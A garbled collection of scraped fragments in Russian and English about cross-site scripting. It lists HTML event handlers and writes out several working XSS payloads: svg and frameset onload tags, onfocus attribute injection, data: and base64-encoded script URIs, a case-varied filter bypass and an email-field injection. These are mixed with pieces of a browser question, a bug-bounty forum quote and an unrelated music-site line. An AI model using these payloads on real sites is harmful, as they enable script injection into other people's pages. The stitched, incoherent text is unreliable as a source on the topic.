...onLayoutComplete onLoad onLoseCapture onMediaComplete onMediaError onMessage onMouseDown onMouseEnter onMouseLeave onMouseMove onMouseOut onMouseOver.
xss внутри значения аттрибута '%20autofocus%20onfocus='alert(); - onfocus не будет работать если у тэга input есть аттрибут type=hidden ' " onfocus='alert
(RFC compliant). "><svg/onload=confirm(1)>"@x.y. Bypass document blacklist.
but same thing is working fine in chrome (no alert). For chrome, when I am checking dev tools, URL is coming in encoded format.
onload is most often used within the <body> element to execute a script once a web page has completely loaded all content (including
<frameset onload=javascript:alert(1)>.
"><svg/onload=alert(1)> said: ↑. I found a vulnerability on your website. Do you have bug bounty program? Click to expand...
XSS с использованием данных. data:text/html,<script>alert(0)</script>data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ
"><Svg Onload=Alert(1)>. Найдено 3 композиции. "> — "> :javascript.alert(1). 3:23.